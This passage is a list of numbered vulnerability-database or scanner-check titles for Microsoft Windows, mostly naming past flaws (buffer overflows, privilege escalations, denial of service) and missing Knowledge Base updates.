of service [54012] Microsoft Windows Knowledge Base Article 972652 update is not installed [53991] Microsoft Windows Knowledge Base Article 973309 update is not installed [53990] Microsoft Windows ADAM LDAP denial of service [53986] Microsoft Windows Knowledge Base Article 973565 update is not installed [53985] Microsoft Windows WSDAPI code execution [53981] Microsoft Windows Knowledge Base Article 974783 update is not installed [53980] Microsoft Windows 2000 License Logging Server buffer overflow [53977] Microsoft Windows Knowledge Base Article 976307 update is not installed [53975] Microsoft Windows Knowledge Base Article 969947 update is not installed [53974] Microsoft Windows kernel font code execution [53973] Microsoft Windows kernel GDI privilege escalation [53972] Microsoft Windows kernel NULL pointer privilege escalation [53551] Microsoft Windows Knowledge Base Article KB973525 update is not installed [53550] Microsoft Windows Knowledge Base Article 974112 update is not installed [53549] Microsoft Windows Media Player ASF file buffer overflow [53548] Microsoft Windows Knowledge Base Article 971486 update is not installed [53547] Microsoft Windows kernel exception handler denial of service [53546] Microsoft Windows kernel user mode privilege escalation [53545] Microsoft Windows kernel 64-bit truncation privilege escalation [53544] Microsoft Windows Knowledge Base Article 974455 update is not installed [53541] Microsoft Windows Knowledge Base Article 969059 update is not installed [53540] Microsoft Windows Indexing Service ActiveX control code execution [53537] Microsoft Windows Knowledge Base Article 974571 update is not installed [53536] Microsoft Windows CryptoAPI ASN.1 spoofing [53535] Microsoft Windows CryptoAPI NULL spoofing [53534] Microsoft Windows Knowledge Base Article 975254 update is not installed [53533] Microsoft Windows Knowledge Base Article 957488 update is not installed [53531] Microsoft Windows GDI+ Microsoft Office file code execution [53530] Microsoft Windows GDI+ PNG image code execution [53529] Microsoft Windows GDI+ .NET Framework API code execution [53528] Microsoft Windows GDI+ TIFF image code execution [53527] Microsoft Windows GDI+ TIFF image buffer overflow [53526] Microsoft Windows GDI+ PNG image buffer overflow [53525] Microsoft Windows GDI+ WMF image code execution [53522] Microsoft Windows Knowledge Base Article 975517 update is not installed [53517] Microsoft Windows Knowledge Base Article 975682 update is not installed [53516] Microsoft Windows Media Player audio files code execution [53514] Microsoft Windows Media Player ASF code execution [53512] Microsoft Windows Knowledge Base Article 975467 update is not installed [53511] Microsoft Windows Local Security Authority Subsystem Service (LSASS) denial of service [53090] Microsoft Windows srv2.sys code execution [52948] Microsoft Windows Knowledge Base Article 973965 update is not installed [52775] Microsoft Windows Knowledge Base Article 973812 update is not installed [52774] Microsoft Windows Media Format MP3 files code execution [52773] Microsoft Windows Media Format ASF files code execution [52771] Microsoft Windows Knowledge Base Article 971961 update is not installed [52770] Microsoft Windows Jscript code execution [52403] Microsoft Windows OpenType font engine denial of service [52137] Microsoft Windows Knowledge Base Article 969706 update is not installed [52131] Microsoft Windows Knowledge Base Article 972260 update is not installed [52128] Microsoft Windows Knowledge Base Article 967723 update is not installed [52127] Microsoft Windows TCP/IP orphaned connections denial of service [52126] Microsoft Windows TCP/IP timestamps code execution [52117] Microsoft Windows Knowledge Base Article 970927 update is not installed [52116] Microsoft Windows RDP Services Client ActiveX control buffer overflow [52115] Microsoft Windows Remote Desktop Connection RDP buffer overflow [52114] Microsoft Windows Knowledge Base Article 970957 update is not installed [52113] ASP.NET Framework component of Microsoft Windows HTTP denial of service [52111] Microsoft Windows Knowledge Base Article 969883 update is not installed [52110] Microsoft Windows Windows Internet Name Service (WINS) replication partner buffer overflow [52109] Microsoft Windows Windows Internet Name Service (WINS) replication buffer overflow [52108] Microsoft Windows Knowledge Base Article 960859 update is not installed [52107] Microsoft Windows Knowledge Base Article 971032 update is not installed [52104] Microsoft Windows telnet privilege escalation [52103] Microsoft Windows Knowledge Base Article 956844 update is not installed [52102] Microsoft Windows DHTML Editing Component ActiveX control code execution [52097] Microsoft Windows Knowledge Base Article 971557 update is not installed [52096] Microsoft Windows AVI validation integer overflow [52095] Microsoft Windows AVI code execution [52093] Microsoft Windows Knowledge Base Article 971657 update is not installed [52092] Microsoft Windows Workstation Service RPC message code execution [52089] Microsoft Windows Knowledge Base Article 973908 update is not installed [51636] Microsoft Windows Knowledge Base Article KB973346 update is not installed [51471] Microsoft Windows Knowledge Base Article 970811 update is not installed [51469] Microsoft Windows Knowledge Base Article 970710 update is not installed [51468] Microsoft Windows Wireless LAN AutoConfig service buffer overflow [51465] Microsoft Windows Knowledge Base Article 969856 update is not installed [51463] Microsoft Windows Knowledge Base Article 971633 update is not installed [51462] Microsoft Windows Knowledge Base Article 969516 update is not installed [51457] Microsoft Windows Knowledge Base Article 957638 update is not installed [51097] Microsoft Windows atapi.sys privilege escalation [51034] Microsoft PowerPoint Freelance Windows buffer overflow [50973] Microsoft Windows Server 2003 and Vista win32k.sys denial of service [50903] Microsoft Windows SPI_SETDESKWALLPAPER SystemParametersInfo denial of service [50826] Microsoft Windows Knowledge Base Article 969898 update is not installed [50798] Microsoft Windows Knowledge Base Article 970238 update is not installed [50797] Microsoft Windows RPC Marshalling Engine code execution [50795] Microsoft Windows Knowledge Base Article 969514 update is not installed [50791] Microsoft Windows Knowledge Base Article 969462 update is not installed [50783] Microsoft Windows Knowledge Base Article 968537 update is not installed [50782] Microsoft Windows desktop parameter privilege escalation [50781] Microsoft Windows system call privilege escalation [50780] Microsoft Windows kernel pointer privilege escalation [50779] Microsoft Windows kernel kernel objects privilege escalation [50778] Microsoft Windows Knowledge Base Article 963093 update is not installed [50777] Microsoft Windows Search weak security [50776] Microsoft Windows Knowledge Base Article 969897 update is not installed [50768] Microsoft Windows Knowledge Base Article 970483 update is not installed [50767] Microsoft Windows Knowledge Base Article 971055 update is not installed [50766] Microsoft Windows Knowledge Base Article 961501 update is not installed [50765] Microsoft Windows Print Spooler service privilege escalation [50763] Microsoft Windows Print Spooler service buffer overflow [50762] Microsoft Windows Knowledge Base Article 961371 update is not installed [50761] Microsoft Windows Active Directory LDAP denial of service [50760] Microsoft Windows Embedded OpenType (EOT) integer overflow [50759] Microsoft Windows 2000 Active Directory LDAP code execution [50758] Microsoft Windows EOT buffer overflow [50757] Microsoft Windows Knowledge Base Article 957632 update is not installed [50391] Microsoft Windows Media Player MID file denial of service [50281] Microsoft Windows Knowledge Base Article 967340 update is not installed [50129] Microsoft Windows gdiplus.dll PNG denial of service [49598] Microsoft Windows Knowledge Base Article 959426 update is not installed [49588] Microsoft Windows Knowledge Base Article 960477 update is not installed [49586] Microsoft Windows Knowledge Base Article 959454 update is not installed [49584] Microsoft Windows Threadpool ACL privilege escalation [49581] Microsoft Windows RPCSS privilege escalation [49578] Microsoft Windows WMI privilege escalation [49570] Microsoft Windows Knowledge Base Article 961759 update is not installed [49569] Microsoft Windows Knowledge Base Article 960803 update is not installed [49566] Microsoft Windows HTTP services certificate spoofing [49562] Microsoft Windows HTTP services integer underflow [49560] Microsoft Windows Knowledge Base Article 961373 update is not installed [49558] Microsoft Windows Knowledge Base Article 963027 update is not installed [49547] Microsoft Windows Knowledge Base Article 968557 update is not installed [49438] Microsoft Windows GDI+ EMF EmfPlusFont Object denial of service [49435] Microsoft Windows unlzh.c and unpack.c gzip code execution [49079] Microsoft Windows DNS server memory leak denial of service [48909] Microsoft Windows Knowledge Base Article 962238 update is not installed [48908] Microsoft Windows WINS server WPAD and ISATAP registration Web proxy spoofing [48907] Microsoft Windows DNS server WPAD registration Web proxy spoofing [48906] Microsoft Windows DNS server cache response spoofing [48905] Microsoft Windows DNS server query response spoofing [48392] Microsoft Windows I/O information disclosure [48326] Microsoft Windows Knowledge Base Article 960715 update is not installed [48312] Microsoft Windows Knowledge Base Article 959420 update is not installed [48311] Microsoft Windows Knowledge Base Article 961260 update not installed [48308] Microsoft Windows Knowledge Base Article 960225 update is not installed [48307] Microsoft Windows SChannel certificate spoofing [48302] Microsoft Windows Knowledge Base Article 957634 update not installed [48301] Microsoft Windows Knowledge Base Article 958690 update is not installed [48300] Microsoft Windows kernel pointer validation privilege escalation [48299] Microsoft Windows kernel handle validation privilege escalation [48298] Microsoft Windows kernel GDI validation code execution [48295] Microsoft Windows Knowledge Base Article 974378 update not installed [48189] Microsoft Windows AutoRun feature enabled [47867] Microsoft Windows .CHM file denial of service [47760] Microsoft Windows Media Player WAV file code execution [47676] Microsoft Windows Knowledge Base Article 958687 update not installed [47674] Microsoft Windows SMB NT Trans2 request code execution [47673] Microsoft Windows SMB NT Trans request buffer overflow [47672] Microsoft Windows Knowledge Base Article 959239 update not installed [47664] Microsoft Windows Media Player WAV or SND file denial of service [47428] Microsoft Windows Knowledge Base Article 960714 update is not installed [46870] Microsoft Windows Knowledge Base Article 959807 update is not installed [46869] Microsoft Windows Media Components ISATAP information disclosure [46868] Microsoft Windows Media Components SPN NTLM credentials code execution [46867] Microsoft Windows Knowledge Base Article 959349 update is not installed [46866] Microsoft Windows search-ms protocol code execution [46865] Microsoft Windows saved search file code execution [46864] Microsoft Windows Knowledge Base Article 959070 update is not installed [46861] Microsoft Windows Knowledge Base Article 958215 update not installed [46856] Microsoft Windows Knowledge Base Article 957175 update is not installed [46853] Microsoft Windows Knowledge Base Article 957173 update not installed [46844] Microsoft Windows Knowledge Base Article 956802 update is not installed [46843] Microsoft Windows GDI WMF image file buffer overflow [46842] Microsoft Windows GDI WMF image file integer overflow [46742] Microsoft Windows Vista iphlpapi.dll buffer overflow [46670] Microsoft Communicator, Office Communications Server (OCS) and Windows Live Messenger RTCP unspecified denial of service [46506] Microsoft Windows UnhookWindowsHookEx() denial of service [46385] Microsoft Windows Media Player MIDI or DAT file denial of service [46194] Microsoft Windows Knowledge Base Article 957097 update is not installed [46191] Microsoft Windows SMB NTLM credentials code execution [46190] Microsoft Windows Knowledge Base Article 932349 update is not installed [46188] Microsoft Visual Basic Windows Common ActiveX control AVI buffer overflow [46102] Microsoft Windows 2003 SP2 is not installed on the system [46101] Microsoft Windows 2003 SP1 is not installed on the system [46100] Microsoft Windows XP Service Pack 3 is not installed on the system [46099] Microsoft Windows XP Service Pack 1 is not installed on the system [46042] Microsoft Windows Knowledge Base Article 958644 update not installed [46040] Microsoft Windows Server Service RPC code execution [45857] Microsoft Windows Mobile HTC Hermes device security bypass [45719] Microsoft Windows Vista page faults denial of service [45586] Microsoft Windows Knowledge Base Article 957280 update is not installed [45585] Microsoft Windows Active Directory LDAP search buffer overflow [45582] Microsoft Windows Knowledge Base Article 956803 update is not installed [45581] Microsoft Windows Knowledge Base Article 956416 update is not installed [45578] Microsoft Windows Ancillary Function Driver privilege escalation [45572] Microsoft Windows Knowledge Base Article 9556841 update is not installed [45571] Microsoft Windows Memory Manager Virtual Address Descriptors privilege escalation [45565] Microsoft Windows Knowledge Base Article 956390 update is not installed [45561] Microsoft Windows Knowledge Base Article 957095 update is not installed [45560] Microsoft Windows SMB file name buffer underflow [45557] Microsoft Windows Knowledge Base Article 955218 update is not installed [45550] Microsoft Windows Knowledge Base Article 957699 update is not installed [45548] Microsoft Windows Knowledge Base Article 953155 update is not installed [45545] Microsoft Windows Internet Printing Protocol code execution [45544] Microsoft Windows Knowledge Base Article 954211 update is not installed [45543] Microsoft Windows kernel input privilege escalation [45542] Microsoft Windows kernel system calls privilege escalation [45541] Microsoft Windows kernel new window privilege escalation [45538] Microsoft Windows Knowledge Base Article 951071 update is not installed [45464] Microsoft Windows XP GDI+ .ICO denial of service [45463] Microsoft Windows Mobile bluetooth device name denial of service [45209] Microsoft Windows Media Player installed [45146] Microsoft Windows WRITE_ANDX SMB packet denial of service [45015] Microsoft Windows Image Aquisition Logger ActiveX control file overwrite [44727] Microsoft Windows Knowledge Base Article 956391 update not installed [44716] Microsoft Windows Knowledge Base Article 954593 update not installed [44715] Microsoft Windows GDI+ BMP header buffer overflow [44714] Microsoft Windows GDI+ WMF buffer overflow [44713] Microsoft Windows GDI+ GIF index parsing buffer overflow [44711] Microsoft Windows GDI+ EMF code execution [44710] Microsoft Windows GDI+ VML gradient buffer overflow [44708] Microsoft Windows Knowledge Base Article 955047 update not installed [44705] Microsoft Windows Knowledge Base Article 956695 update not installed [44703] Microsoft Windows Knowledge Base Article 954156 update not installed [44700] Microsoft Windows Media Encoder wmex.dll ActiveX control buffer overflow [44625] Microsoft Windows ATL Load() code execution [44423] Microsoft Windows nslookup.exe code execution [44106] Microsoft Windows Knowledge Base Article 953839 update not installed [44099] Microsoft Windows Knowledge Base Article 953838 update not installed [44092] Microsoft Windows Knowledge Base Article 954066 update not installed [44087] Microsoft Windows Knowledge Base Article 953733 update not installed [44086] Microsoft Windows IPSec policy information disclosure [44085] Microsoft Windows Knowledge Base Article 952954 update not installed [44083] Microsoft Windows Knowledge Base Article 954154 update not installed [44082] Microsoft Windows Media Player sampling rate SSPL buffer overflow [44081] Microsoft Windows Knowledge Base Article 955048 update not installed [44080] Microsoft Windows Knowledge Base Article 955617 update not installed [44079] Microsoft Windows Knowledge Base Article 950974 update not installed [43340] Microsoft Windows Knowledge Base Article 950582 update not installed [43339] Microsoft Windows Explorer saved search file code execution [43336] Microsoft Windows Knowledge Base Article 953230 update not installed [43335] Microsoft Windows DNS Server cache poisoning [43330] Microsoft Windows Knowledge Base Article 953747 update not installed [42887] Microsoft Windows Installer msiexec.exe GUID buffer overflow [42765] Apple Safari Microsoft Windows code execution [42701] Microsoft Windows Knowledge Base Article 950760 update not installed [42699] Microsoft Windows Vista speech recognition (sapi.dll) command execution [42697] Microsoft Windows Knowledge Base Article 950762 update not installed [42696] Microsoft Windows PGM fragment option denial of service [42695] Microsoft Windows PGM option length denial of service [42693] Microsoft Windows Knowledge Base Article 950759 update not installed [42691] Microsoft Windows Knowledge Base Article 949785 update not installed [42689] Microsoft Windows Knowledge Base Article 951066 update not installed bluetooth [42685] Microsoft Windows Knowledge Base Article 951376 update not installed [42684] Microsoft Windows Knowledge Base Article 948745 update not installed [42682] Microsoft Windows Bluetooth SDP code execution [42677] Microsoft Windows Knowledge Base Article 955702 update not installed [42676] Microsoft Windows Messenger ActiveX control information disclosure [42675] Microsoft Windows Knowledge Base Article 951698 update not installed [42674] Microsoft Windows DirectX SAMI buffer overflow [42672] Microsoft Windows Knowledge Base Article 953235 update not installed [42668] Microsoft Windows Active Directory LDAP request denial of service [42358] Microsoft Windows I2O Utility Filter driver (i2omgmt.sys) code execution [42334] Microsoft Windows CE JPEG and GIF code execution [42109] Microsoft Windows Knowledge Base Article 952044 update not installed [42103] Microsoft Windows Knowledge Base Article 951208 update not installed [42101] Microsoft Windows Knowledge Base Article 951207 update not installed [42095] Microsoft Windows Knowledge Base Article 950749 update not installed [41880] Microsoft Windows MSDTC privilege escalation [41481] Microsoft Windows Knowledge Base Article 945553 update not installed [41480] Microsoft Windows DNS client spoofing [41477] Microsoft Windows Knowledge Base Article 947864 update not installed [41473] Microsoft Windows Knowledge Base Article 948590 update not installed [41472] Microsoft Windows GDI EMF filename parameter buffer overflow [41471] Microsoft Windows GDI EMF and WMF header buffer overflow [41470] Microsoft Windows Knowledge Base Article 941693 update not installed [41469] Microsoft Windows kernel usermode privilege escalation [41465] Microsoft Windows Knowledge Base Article 948881 update not installed [41463] Microsoft Windows Knowledge Base Article 941203 update not installed [41453] Microsoft Windows Knowledge Base Article 949032 update not installed [41448] Microsoft Windows Knowledge Base Article 950183 update not installed [41349] Microsoft Windows AutoPlay NoDriveTypeAutoRun weak security [40937] Microsoft Windows Knowledge Base Article 815495 update not installed [40889] Microsoft Windows Knowledge Base Article 949030 update not installed [40886] Microsoft Windows Knowledge Base Article 949031 update not installed [40879] Microsoft Windows Knowledge Base Article 949029 update not installed [40693] Microsoft Windows Video Controller ActiveX Library for streaming video (msvidctl.dll) buffer overflow [40103] Microsoft Windows Knowledge Base Article 946538 update not installed [40102] Microsoft Windows Active Directory LDAP request denial of service [40101] Microsoft Windows Knowledge Base Article 947077 update not installed [40099] Microsoft Windows Knowledge Base Article 946456 update not installed [40098] Microsoft Windows Vista DHCP denial of service [40097] Microsoft Windows Knowledge Base Article 947081 update not installed [40094] Microsoft Windows Knowledge Base Article 947085 update not installed [40091] Microsoft Windows Knowledge Base Article 944533 update not installed [40078] Microsoft Windows Knowledge Base Article 947108 update not installed [40063] Microsoft Windows Knowledge Base Article 946026 update not installed [40062] Microsoft Windows WebDAV Mini-Redirector buffer overflow [40059] Microsoft Windows Knowledge Base Article 944338 update not installed [40056] Microsoft Windows VBScript and JScript engines code execution [40048] Microsoft Windows Knowledge Base Article 947890 update not installed [40043] Microsoft Windows OLE script request buffer overflow [39453] Microsoft Windows TCP/IP Source Specific Multicasting (SSM) MLDv2 buffer overflow [39452] Microsoft Windows TCP/IP Source Specific Multicasting (SSM) IGMPv3 buffer overflow [39254] Microsoft Windows TCP/IP ICMP denial of service [39238] Microsoft Windows Knowledge Base Article 941644 update not installed [39237] Microsoft Windows Knowledge Base Article 942831 update not installed [39236] Microsoft Windows Knowledge Base Article 943485 update not installed [39233] Microsoft Windows LSASS LPC privilege escalation [39232] Microsoft Windows Knowledge Base Article 942830 update not installed [39052] Microsoft Windows DirectX MJPEG decoder code execution [38865] Cisco Security Agent for Microsoft Windows SMB buffer overflow [38850] Microsoft Windows CryptGenRandom information disclosure [38830] Microsoft Windows Media File Format Stream Property error correction buffer overflow [38829] Microsoft Windows Media File Format Stream Property error correction and type-specific buffer overflow [38828] Microsoft Windows Media File Format audio_conceal_none buffer overflow [38827] Microsoft Windows Media File Format Degradable JPEG Media Stream buffer overflow [38797] Microsoft Windows Media Player AIFF denial of service [38730] Microsoft Windows Knowledge Base Article 943078 update not installed [38729] Microsoft Windows Vista kernel ALPC privilege escalation [38728] Microsoft Windows Knowledge Base Article 944653 update not installed [38726] Microsoft Windows Knowledge Base Article 942624 update not installed [38725] Microsoft Windows Vista SMBv2 signing code execution [38723] Microsoft Windows Knowledge Base Article 941568 update not installed [38717] Microsoft Windows Knowledge Base Article 942615 update not installed [38711] Microsoft Windows Knowledge Base Article 941569 update not installed [38315] Microsoft Windows Knowledge Base Article 943460 update not installed [37284] Microsoft Windows Macrovision secdrv.sys driver buffer overflow [37249] Microsoft Windows Mobile SMS sender field obfuscation [37226] Microsoft Windows Knowledge Base Article 815495 update not installed [36980] Microsoft Windows Explorer PNG file denial of service [36961] Microsoft Windows Explorer extended attributes multiple buffer overflows [36819] Microsoft Windows Knowledge Base Article 939653 update not installed [36812] Microsoft Windows Knowledge Base Article 941202 update not installed [36811] Microsoft Outlook Express and Windows Mail NNTP response code execution [36807] Microsoft Windows Knowledge Base Article 933729 update not installed [36806] Microsoft Windows Knowledge Base Article 941672 update not installed [36805] Microsoft Windows DNS spoofing information disclosure [36804] Microsoft Windows Knowledge Base Article 942695 update not installed [36803] Microsoft Windows RPC NTLMSSP authentication denial of service [36800] Microsoft Windows Knowledge Base Article 923810 update not installed [36799] Microsoft Windows Kodak image Viewer code execution [36662] Microsoft Windows Media Player meta file security bypass [36608] Microsoft Windows MFC ActiveX FindFile() buffer overflow [36490] Microsoft Windows Knowledge Base Article 942099 update not installed [36381] Microsoft Windows Knowledge Base Article 939778 update not installed [36378] Microsoft Windows UNIX services setuid binary privilege escalation [36376] Microsoft Windows Knowledge Base Article 941522 update not installed [35919] Microsoft Windows VML detected [35902] Microsoft Windows process scheduler denial of service [35897] Microsoft Windows Vista Weather Gadget code execution [35895] Microsoft Windows Media Player skin decompression code execution [35886] Microsoft Windows ARP request denial of service [35878] Microsoft Windows Media Player .AU file denial of service [35853] Microsoft Windows Vista kernel unspecified vulnerability [35816] Microsoft Windows Knowledge Base Article 940965 update not installed [35802] Microsoft Windows Vista Calendar ICS denial of service [35771] Microsoft Windows Vista Contacts Gadget code execution [35770] Microsoft Windows Vista Feed Headlines Gadget code execution [35766] Microsoft Windows Knowledge Base Article 937894 update not installed [35762] Microsoft Windows Knowledge Base Article 938127 update not installed [35761] Microsoft Windows VML vgx.dll buffer overflow [35760] Microsoft Windows Knowledge Base Article 937143 update not installed [35753] Microsoft Windows Knowledge Base Article 938827 update not installed [35746] Microsoft Windows Knowledge Base Article 938829 update not installed [35745] Microsoft Windows GDI WMF image code execution [35742] Microsoft Windows Knowledge Base Article 936782 update not installed [35741] Microsoft Windows Media Player skin parsing buffer overflow [35739] Microsoft Windows Knowledge Base Article 942017 update not installed [35582] Microsoft Windows URI protocol handling command execution [35538] Microsoft Windows Explorer GIF denial of service [35397] Microsoft Windows Vista USER32.DLL denial of service [35322] Microsoft Windows Vista firewall information disclosure [35219] Microsoft Windows Knowledge Base Article 936542 update is not installed [35216] Microsoft Windows Knowledge Base Article 933103 update not installed [35206] Microsoft Windows Knowledge Base Article 939373 update is not installed [35202] Microsoft Windows Knowledge Base Article 935807 update not installed [35199] Microsoft Windows Knowledge Base Article 936227 update not installed [35190] Microsoft Windows Knowledge Base Article 936548 update not installed [35183] Microsoft Windows Knowledge Base Article 937986 update not installed [35181] Microsoft Windows Knowledge Base Article 926122 update is not installed [35180] Microsoft Windows Active Directory LDAP denial of service [35179] Microsoft Windows Active Directory LDAP attribute buffer overflow [35059] Microsoft Windows TCP/IP Source Specific Multicasting (SSM) multiple buffer overflows [34743] Microsoft Windows GDI+ denial of service [34648] Microsoft Windows Knowledge Base Article 935839 update not installed [34645] Microsoft Windows Win32 API code execution [34642] Microsoft Windows Knowledge Base Article 935840 update not installed [34640] Microsoft Windows Knowledge Base Article 931212 update not installed .NET [34636] Microsoft Windows Schannel code execution [34634] Microsoft Windows Server 2003 Active Directory information disclosure [34633] Microsoft Windows Knowledge Base Article 933566 update not installed [34624] Microsoft Windows Knowledge Base Article 929123 update not installed [34623] Microsoft Windows MHTML Content-Disposition information disclosure [34622] Microsoft Windows MHTML URL redirect information disclosure [34618] Microsoft Windows Vista ACL user credentials information disclosure [34611] Microsoft Windows Knowledge Base Article 927051 update not installed [34599] Microsoft Windows Server 2003 terminal server security bypass [34444] Microsoft Windows unspecified code execution [34032] Microsoft Windows Knowledge Base Article 935966 update not installed [33959] Microsoft Windows Virtual DOS Machine (VDM) VdmpInitialize privilege escalation [33916] Microsoft Windows Knowledge Base Article 934233 update not installed [33909] Microsoft Windows Knowledge Base Article 934873 update not installed [33902] Microsoft Windows Knowledge Base Article 934232 update not installed [33891] Microsoft Windows Knowledge Base Article 931832 update not installed [33667] Microsoft Windows unspecified buffer overflow [33629] Microsoft Windows DNS Server RPC interface buffer overflow [33473] Microsoft Windows dynamic DNS update unauthorized access [33410] Microsoft Windows Vista LLTD Mapper host spoofing [33409] Microsoft Windows Vista LLTD Mapper bridge spoofing [33401] Microsoft Windows Vista LLTD Responder host spoofing [33399] Microsoft Windows Vista LLTD Mapper denial of service [33398] Microsoft Windows Vista Teredo address weak security [33396] Microsoft Windows Vista Meeting Space weak security [33395] Microsoft Windows Vista nonce spoofing [33394] Microsoft Windows Vista Neighbor Advertisements spoofing [33393] Microsoft Windows Vista ARP denial of service [33301] Microsoft Windows animated cursor (ANI) buffer overflow [33300] Microsoft Windows Vista atikmdag.sys slideshow denial of service [33272] Microsoft Windows Vista CSRSS CsrFinalizeContext privilege escalation [33271] Microsoft Windows Knowledge Base Article 931784 update not installed [33270] Microsoft Windows kernel VDM mapped memory privilege escalation [33269] Microsoft Windows Knowledge Base Article 931261 update not installed [33268] Microsoft Windows Universal Plug and Play HTTP buffer overflow [33267] Microsoft Windows Knowledge Base Article 932168 update not installed [33266] Microsoft Windows Knowledge Base Article 925902 update not installed [33264] Microsoft Windows TrueType Fonts rasterizer privilege escalation [33263] Microsoft Windows GDI color parameter buffer overflow [33261] Microsoft Windows GDI window size privilege escalation [33259] Microsoft Windows GDI EMF image buffer overflow [33258] Microsoft Windows GDI WMF image denial of service [33257] Microsoft Windows Knowledge Base Article 931768 update not installed [33244] Microsoft Windows Web Proxy Autodiscovery Protocol (WPAD) information disclosure [33225] Microsoft Windows Media File Format ASF multiple buffer overflows [33167] Microsoft Windows Vista Mail Client code execution [33118] Microsoft Windows XP winmm.dll denial of service [33117] Microsoft Windows MFC AfxOleSetEditMenu() buffer overflow [33086] Microsoft Windows Ndistapi.sys driver denial of service [33037] Microsoft Windows Explorer WMF file denial of service [32921] Microsoft Windows ole32.dll library denial of service [32808] Microsoft Windows Shell User Logon ActiveX control shgina.dll unauthorized access [32740] Microsoft Windows Knowledge Base Article 931906 update not installed [32738] Microsoft Windows Knowledge Base Article 925939 update not installed [32644] Microsoft Windows ReadDirectoryChangesW information disclosure [32419] Microsoft Windows Knowledge Base Article 932554 update not installed [32394] Microsoft Windows Mobile Internet Explorer WML page denial of service [32282] Microsoft Windows Knowledge Base Article 927802 update not installed [32280] Microsoft Windows Image Acquisition service buffer overflow [32153] Microsoft Windows permanent password detected [32116] Microsoft Windows administrator password no expiration set [32111] Microsoft Windows Knowledge Base Article 928255 update not installed [32110] Microsoft Windows Knowledge Base Article 928843 update not installed [32109] Microsoft Windows HTML Help ActiveX control code execution [32108] Microsoft Windows shell new hardware detection privilege escalation [32107] Microsoft Windows Knowledge Base Article 928090 update not installed [32104] Microsoft Windows Knowledge Base Article 929434 update not installed [32090] Microsoft Windows Knowledge Base Article 927779 update not installed [32071] Microsoft Windows Explorer AVI file denial of service [32002] Microsoft Windows Mobile Pictures and Videos JPEG denial of service [32001] Microsoft Windows Mobile Internet Explorer unspecified denial of service [31845] Microsoft Windows user account never used [31844] Microsoft Windows guest user account unchanged [31843] Microsoft Windows built-in guest account enumerated [31842] Microsoft Windows user account password unchanged [31821] Microsoft Windows time zone update for year 2007 [31288] Microsoft Windows Knowledge Base Article 929969 update not installed [31264] Microsoft Windows Knowledge Base Article 930178 update not installed [31210] Microsoft Windows Knowledge Base Article 927198 update is not installed [31199] Microsoft Windows Knowledge Base Article 921585 update is not installed [31191] Microsoft Windows Knowledge Base Article 925938 update is not installed [31176] Microsoft Windows CSRSS NtRaiseHardError() information disclosure [31085] Microsoft Windows Workstation service NetrWkstaUserEnum denial of service [31018] Microsoft Windows CSRSS MessageBox function privilege escalation [31015] Microsoft Windows Explorer WMV file denial of service [31014] Microsoft Windows Media Player MIDI file denial of service [31008] Microsoft Windows XP directory weak permission [30757] Microsoft Windows Knowledge Base Article 926121 update not installed [30756] Microsoft Windows Remote Installation Service code execution [30717] Microsoft Windows Print Spooler denial of service [30610] Microsoft Windows Knowledge Base Article 926436 update not installed [30608] Microsoft Windows Knowledge Base Article 926255 update not installed [30607] Microsoft Windows file manifest privilege escalation [30606] Microsoft Windows Knowledge Base Article 926247 update not installed [30605] Microsoft Windows SNMP service buffer overflow [30604] Microsoft Windows Knowledge Base Article 925454 update not installed [30599] Microsoft Windows Knowledge Base Article 924667 update not installed [30598] Microsoft Windows and Visual Studio MFC components RTF code execution [30597] Microsoft Windows Knowledge Base Article 923723 update not installed [30595] Microsoft Windows Knowledge Base Article 923689 update not installed [30594] Microsoft Windows Media Player ASF processing buffer overflow [30593] Microsoft Windows Knowledge Base Article 918118 update not installed [30592] Microsoft Windows and Office Rich Edit components code execution [30591] Microsoft Windows Knowledge Base Article 925674 update not installed [30586] Microsoft Windows Media Player ASX playlist buffer overflow [30553] Microsoft Windows Live Messenger emoticon denial of service [30172] Microsoft Windows Knowledge Base Article 928088 update not installed [30042] Microsoft Windows GDI kernel privilege escalation [29954] Microsoft Windows Knowledge Base Article 923980 update not installed [29953] Microsoft Windows Client Service for NetWare (CSNW) denial of service [29952] Microsoft Windows Client Service for NetWare (CSNW) buffer overflow [29950] Microsoft Windows Knowledge Base Article 920213 update is not installed [29949] Microsoft Windows Knowledge Base Article 924270 update not installed [29948] Microsoft Windows Workstation service NetpManageIPCConnect buffer overflow [29943] Microsoft Windows Knowledge Base Article 923789 update not installed [29917] Microsoft Windows XP NAT Helper ipnathlp.dll denial of service [29546] Microsoft Windows 2000/2003 user logoff initiated [29545] Microsoft Windows 2000/2003 system time changed [29544] Microsoft Windows 2000/2003 system security access removed [29543] Microsoft Windows 2000/2003 security access granted [29542] Microsoft Windows 2000/2003 SAM notification package loaded [29541] Microsoft Windows 2000/2003 primary security token issued [29540] Microsoft Windows 2000/2003 user password reset successful [29539] Microsoft Windows 2000/2003 object indirectly accessed [29538] Microsoft Windows 2000/2003 object handle duplicated [29537] Microsoft Windows 2000/2003 logon with explicit credentials success [29536] Microsoft Windows 2000/2003 logon attempt using explicit credentials unsuccessful [29535] Microsoft Windows 2000/2003 IPSEC policy agent failed [29534] Microsoft Windows 2000/2003 IPSEC policy agent disabled [29533] Microsoft Windows 2000/2003 IPSEC policy agent changed [29532] Microsoft Windows 2000/2003 IKE security association established [29531] Microsoft Windows 2000/2003 IKE quick mode association ended [29530] Microsoft Windows 2000/2003 IKE main mode association ended [29529] Microsoft Windows 2000/2003 IKE association negotiation failed [29528] Microsoft Windows 2000/2003 IKE association peer authentication failed [29527] Microsoft Windows 2000/2003 IKE association failed invalid proposal [29526] Microsoft Windows 2000/2003 IKE association failed authentication parameters [29525] Microsoft Windows 2000/2003 DPAPI master key backup attempted [29524] Microsoft Windows 2000/2003 DPAPI key recovery attempted [29523] Microsoft Windows 2000/2003 DPAPI auditable data unprotected [29522] Microsoft Windows 2000/2003 administrative group security descriptor set [29521] Microsoft Windows 2000/2003 account name changed [29400] Microsoft Windows drmstor.dll denial of service [29373] Microsoft Windows SMB rename denial of service [29369] Microsoft Windows Knowledge Base Article 922819 update is not installed [29253] Microsoft Windows error report transmission detected [29243] Microsoft Windows Knowledge Base Article 924164 update is not installed [29236] Microsoft Windows Knowledge Base Article 924163 update is not installed [29229] Microsoft Windows Knowledge Base Article 923694 update not installed [29227] Microsoft Outlook Express Windows Address Book (WAB) buffer overflow [29226] Microsoft Windows Knowledge Base Article 924554 update is not installed [29214] Microsoft Windows Knowledge Base Article 922581 update is not installed [29211] Microsoft Windows Knowledge Base Article 924191 update is not installed [29208] Microsoft Windows Knowledge Base Article 924496 update is not installed [29205] Microsoft Windows Object Packager file extension spoofing code execution [29204] Microsoft Windows Knowledge Base Article 923414 update is not installed [29202] Microsoft Windows 